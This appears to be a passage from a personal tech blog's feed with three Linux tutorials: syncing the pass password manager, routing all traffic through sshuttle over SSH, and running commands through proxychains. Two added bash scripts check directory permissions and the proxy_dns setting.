<p><strong>No passphrase asked? Isn’t this unsafe?</strong></p>
<p>The password store is encrypted asymmetrically: anyone with the public key can encrypt a new entry, but only the holder of the private key can decrypt it.</p>
<p><strong>To list the available passwords just type:</strong></p>
<pre>pass show</pre>
<p><strong>To retrieve the password we just created, do:</strong></p>
<pre>pass show stuffathome/thingseverybodyshouldknow/wifipassword</pre>
<p>Now it will ask for the passphrase of the gpg key you specified in the setup command, and then print the password. That is really all you need to know to use this password manager. The unlocked key stays available for a short time before the cache times out. That’s it!</p>
<h2>Syncing your passwords</h2>
<p>To synchronize your password manager between devices, you need to synchronize two sets of files. The first is your gpg key, stored in the folder ~/.gnupg by default. You can change where GnuPG looks for these files by setting the $GNUPGHOME variable:</p>
<pre>export GNUPGHOME=~/keys</pre>
<p>Now you can move your .gnupg folder to a new location and put that location in this variable (keep the ~ outside of quotes, or write $HOME, otherwise the shell does not expand it and gpg looks for a directory literally named “~/keys”). REMINDER: you have to put this command in your ~/.bashrc file or alias it together with your pass command (more on that later).</p>
<p>Your passwords are stored in a directory called a store, which pass set up for you; the default location is ~/.password-store. If you move it, change the variables $PASSWORD_STORE_DIR and $PASSWORD_STORE_GIT to the location of your store. All of this in one command (put this in ~/.bashrc):</p>
<pre>alias pass='GNUPGHOME=~/keys PASSWORD_STORE_DIR=~/DATA/PASSWORDS PASSWORD_STORE_GIT=~/DATA/PASSWORDS pass'</pre>
<p>This alias makes your pass command always use these variables. Copy the password store and the key to a service like Dropbox or into a synced git repository, put the paths to these directories in the alias, and you are set! Please keep the key and the password store separate: whoever obtains both has the encrypted passwords and the private key together, and only the passphrase still stands between them and your passwords, so you lose the protection of your 4096-bit key.</p>
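<p>As an added example that is not part of the original post or of pass itself, the following bash script checks the two directories the alias points at before you trust a synced copy of them, and lists the entries of a store without decrypting anything (every entry is a <code class="language-plaintext highlighter-rouge">.gpg</code> file and every ‘/’ in a name is a subdirectory, as described above). The paths ~/keys and ~/DATA/PASSWORDS are only the assumptions taken from the alias; the demo at the bottom builds a throw-away store in a temporary directory instead.</p>

```shell
#!/usr/bin/env bash
# Added example, not from the original post and not part of pass.
# Checks that the key directory and the password store look the way gpg and
# pass expect before you point the alias at a synced copy of them:
#   - both directories exist and are mode 700 (gpg warns about an unsafe
#     GNUPGHOME that other users can read)
#   - the store carries the .gpg-id file that `pass init <id>` wrote
# and lists the entries of a store without touching gpg at all.
# Paths are assumptions: pass them as arguments (e.g. ~/keys ~/DATA/PASSWORDS).

# dir_mode <dir>: permission string of a directory, e.g. "drwx------".
dir_mode() {
    ls -ld "$1" | cut -c1-10
}

# check_pass_dirs <gnupg_home> <store_dir>
# Prints one line per problem found and returns the number of problems (0 = ok).
check_pass_dirs() {
    local gnupg_home="$1" store_dir="$2" problems=0 dir
    for dir in "$gnupg_home" "$store_dir"; do
        if [ ! -d "$dir" ]; then
            echo "missing directory: $dir"
            problems=$((problems + 1))
        elif [ "$(dir_mode "$dir")" != "drwx------" ]; then
            echo "unsafe permissions on $dir (want 700): $(dir_mode "$dir")"
            problems=$((problems + 1))
        fi
    done
    if [ -d "$store_dir" ] && [ ! -s "$store_dir/.gpg-id" ]; then
        echo "no .gpg-id in $store_dir: run 'pass init <id>' against this store"
        problems=$((problems + 1))
    fi
    return "$problems"
}

# list_store_entries <store_dir>
# Prints the entry names the way `pass show` lists them, one per line, sorted:
# each entry is a <name>.gpg file, and directories are the '/' levels.
list_store_entries() {
    local store_dir="$1"
    (cd "$store_dir" && find . -name '*.gpg' -type f \
        | sed -e 's|^\./||' -e 's|\.gpg$||' | sort)
}

# Constructed demo: a throw-away store with one entry, same layout as the post.
demo_store=$(mktemp -d)
chmod 700 "$demo_store"
mkdir -p "$demo_store/stuffathome/thingseverybodyshouldknow"
printf 'gpg@larsveelaert.com\n' > "$demo_store/.gpg-id"            # what `pass init` writes
: > "$demo_store/stuffathome/thingseverybodyshouldknow/wifipassword.gpg"  # constructed, empty
check_pass_dirs "$demo_store" "$demo_store" && echo "ok: $demo_store"
list_store_entries "$demo_store"
rm -rf "$demo_store"
```

<p>The demo passes the same temporary directory as both key directory and store only to keep it self-contained; on a real machine you would run <code class="language-plaintext highlighter-rouge">check_pass_dirs ~/keys ~/DATA/PASSWORDS</code> once after every sync.</p>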
<p>That’s it! Good Luck with your password manager!</p>Lars Veelaert
A transparent poor man’s VPN with sshuttle2017-02-17T00:00:00+00:002017-02-17T00:00:00+00:00https://lvlrt.github.io/2017/02/17/poor-man-vpn<p><img src="/assets/vpn.png" alt="header" /></p>
<h2>Why?</h2>
<p>There are a lot of reasons why you would want a <a href="https://en.wikipedia.org/wiki/Proxy_server">proxy</a> or <a href="https://en.wikipedia.org/wiki/Virtual_private_network">VPN</a>; one of them is safety and protection from attackers at your location. For example, if you are visiting sensitive sites from your local coffee shop, other visitors could sniff your traffic because they are connected to the same network. From there it is possible not only to read but also to manipulate the traffic and possibly inject malicious code. Other use cases are services that are only accessible behind a firewall, or only if the user appears to be located at a certain IP address.</p>
<p>Most of the time, a proxy reroutes a single connection, while a VPN is the more client-friendly option that reroutes all traffic from a system.
If you do not want to configure every application to use your proxy and want to reroute all traffic, the tool <code class="language-plaintext highlighter-rouge">sshuttle</code> is a perfect fit.
It uses SSH under the hood, so access is managed by your existing SSH server and no extra user management is required.</p>
<p>If you are looking for a way to route only one command or application through a proxy, have a look at <a href="/2017/02/02/tip-running-a-terminal-command-through-a-proxy/">an earlier article</a> I wrote.
In many cases you don’t need to look for the application’s native proxy settings at all.
Keep in mind that the more traffic you route through your SSH server,
the more demanding and slower the operation becomes. Let’s begin!</p>
<h2>How to install?</h2>
<p>There are two things you will need:</p>
<ul>
<li>An SSH server on a remote device (there are tutorials specific to your flavour of Linux)</li>
<li><em><a href="https://pypi.python.org/pypi/pip">pip</a></em>, the package manager for Python</li>
</ul>
<p>To install the Python package manager, run one of the following commands:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>apt-get install python-pip    # for Debian and others
pacman -Sy python python-pip  # for Arch Linux users (the package is named python-pip, not pip)
</code></pre></div></div>
<p>Now we can install <em>sshuttle</em>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pip install sshuttle
</code></pre></div></div>
<p>Done!</p>
<h3>How to set it up?</h3>
<p>There are a lot of general options and specific routing options that can be configured with <code class="language-plaintext highlighter-rouge">sshuttle</code>,
but this article will only explain the transparent proxy (rerouting all outgoing traffic).
You can find the full documentation <a href="https://sshuttle.readthedocs.io/en/stable/overview.html">here</a>.</p>
<p>Now, for example, if we had an SSH server located at 192.168.13.2 and properly configured to accept connections from our address, we could run:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sshuttle --dns -vvr me@192.168.13.2:22 0/0
</code></pre></div></div>
<p>This first connects to your SSH server and then starts routing all traffic from your system through it.
As the extra <code class="language-plaintext highlighter-rouge">--dns</code> option shows, your DNS requests are tunneled as well.</p>
<p>To make sure no traffic leaks, look into network monitoring software like <a href="https://www.wireshark.org/">Wireshark</a>: launch some applications and check whether anything bypasses the tunnel.</p>
<h3>Tip for experts</h3>
<p>You can write a bash function to automate the process and quickly switch between servers.
For this example we use the basic sshuttle command, but any variant will work.</p>
<p>Add a function to your .bashrc file like this:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>proxy () {
    # $1 is the SSH destination: user@host:port or a Host alias from ~/.ssh/config
    sshuttle --dns -vvr "$1" 0/0
}
</code></pre></div></div>
<p>The result of this will be that you can run one of the following in your bash-prompt:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ proxy me@192.168.13.2:22
$ proxy ssh_server1
</code></pre></div></div>
<p>It will proxy all your traffic through the given SSH server.
To use the alias form of the second example, configure the destination as a Host entry in your ~/.ssh/config file; that is what makes it really convenient.
sshuttle will also use the keys loaded in your SSH agent.</p>
<p>There is awesome documentation of this program, so <a href="https://sshuttle.readthedocs.io/en/stable/overview.html">make sure to check it out</a>!</p>Lars Veelaert
Quick tip: Running a terminal command through a proxy2017-02-02T00:00:00+00:002017-02-02T00:00:00+00:00https://lvlrt.github.io/2017/02/02/running-a-terminal-command-through-a-proxy<p>Sometimes, running a full <a href="https://en.wikipedia.org/wiki/Virtual_private_network">VPN</a> is not necessary, or there is not enough bandwidth for all your traffic.
When using <a href="https://www.torproject.org/">Tor</a>, for example, tunneling all your traffic can even be dangerous!
So there is a way to specify per command or program whether it should tunnel its web traffic through the proxy or not.
This tool is called <code class="language-plaintext highlighter-rouge">proxychains</code>.</p>
<p>If you, for example, want to download a file through a proxy with the <code class="language-plaintext highlighter-rouge">wget</code> command, just prepend <code class="language-plaintext highlighter-rouge">proxychains</code> to the command and you are done!</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ proxychains wget www.remoteserver.com/fileIneed
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/libproxychains4.so
[proxychains] DLL init: proxychains-ng 4.12
--2018-01-08 23:18:33-- http://www.remoteserver.com/fileineed
</code></pre></div></div>
<p>Great, that works, but it prints some extra output; you can silence it with the -q flag:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>proxychains -q ...
</code></pre></div></div>
<p>To set it up on your system, follow these steps:</p>
<h3>1. Installation</h3>
<p>For example on Arch Linux do:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pacman -Sy proxychains
</code></pre></div></div>
<p>On Ubuntu or other Debian-based distros:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>apt-get install proxychains
</code></pre></div></div>
<h3>2. Configuration</h3>
<p>Proxychains has a lot of configuration options, but all you need to do is go to the end of the file /etc/proxychains.conf and edit the last line:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#nano /etc/proxychains.conf
socks4 127.0.0.1 9050
</code></pre></div></div>
<p>It is preconfigured to use Tor, which means a socks4 proxy on localhost port 9050.</p>
<p>Configure this to your needs; for example, to use a SOCKS5 proxy created by SSH, do this:</p>
<ul>
<li>The command to run to make the SSH connection (it opens a SOCKS proxy on local port 5000):
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ssh remoteserver -D 5000
</code></pre></div> </div>
</li>
<li>Edit the configuration file like this:
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>socks5 127.0.0.1 5000
</code></pre></div></div>
</li>
</ul>
<h3>3. Done!</h3>
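<p>As an added example that is not part of the original post or of proxychains, the following bash script reads a proxychains.conf and reports the two things worth verifying before relying on it: that the <code class="language-plaintext highlighter-rouge">proxy_dns</code> option is enabled (without it, name lookups go out unproxied and reveal the hostnames you visit even though the connections themselves are tunneled), and which proxies are listed under <code class="language-plaintext highlighter-rouge">[ProxyList]</code>. The configuration it parses at the bottom is a constructed sample using the SSH SOCKS5 entry from the steps above, not a copy of any real file.</p>

```shell
#!/usr/bin/env bash
# Added example, not from the original post and not part of proxychains.
# Inspects a proxychains.conf: is proxy_dns enabled, and which proxies are
# configured under [ProxyList]? The sample file at the bottom is constructed.

# proxy_dns_enabled <conf>: returns 0 when an uncommented proxy_dns line exists.
proxy_dns_enabled() {
    grep -q '^[[:space:]]*proxy_dns[[:space:]]*$' "$1"
}

# proxy_list <conf>: prints "type host port" for each entry below [ProxyList],
# skipping blank lines and comments, until the next [section] if any.
proxy_list() {
    awk '
        /^\[ProxyList\]/ { inlist = 1; next }
        /^\[/            { inlist = 0 }
        inlist && !/^[[:space:]]*(#|$)/ { print $1, $2, $3 }
    ' "$1"
}

# check_proxychains_conf <conf>: prints a summary; returns 0 when proxy_dns is
# on and at least one proxy is configured, 1 otherwise.
check_proxychains_conf() {
    local conf="$1" ok=0 entries
    if proxy_dns_enabled "$conf"; then
        echo "proxy_dns: enabled"
    else
        echo "proxy_dns: DISABLED - DNS queries will bypass the proxy"
        ok=1
    fi
    entries=$(proxy_list "$conf")
    if [ -z "$entries" ]; then
        echo "no proxies listed under [ProxyList]"
        ok=1
    else
        echo "$entries" | sed 's/^/proxy: /'
    fi
    return "$ok"
}

# Constructed sample: the SSH SOCKS5 proxy from the post, with proxy_dns on
# and the Tor default left commented out.
sample_conf=$(mktemp)
cat > "$sample_conf" <<'EOF'
# constructed sample proxychains.conf
strict_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
# socks4 127.0.0.1 9050
socks5 127.0.0.1 5000
EOF
check_proxychains_conf "$sample_conf"
rm -f "$sample_conf"
```

<p>Run <code class="language-plaintext highlighter-rouge">check_proxychains_conf /etc/proxychains.conf</code> after editing the file; a non-zero exit code means either DNS is not being proxied or no proxy is active, which is exactly the state in which a <code class="language-plaintext highlighter-rouge">proxychains wget …</code> would silently leak.</p>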
<p>That’s it! Proxies can be amazing for changing how you appear to the public internet, reaching otherwise inaccessible content or tunneling your way out of a restrictive firewall or filter, so knowing how to use them in a terminal environment is essential.</p>Lars Veelaert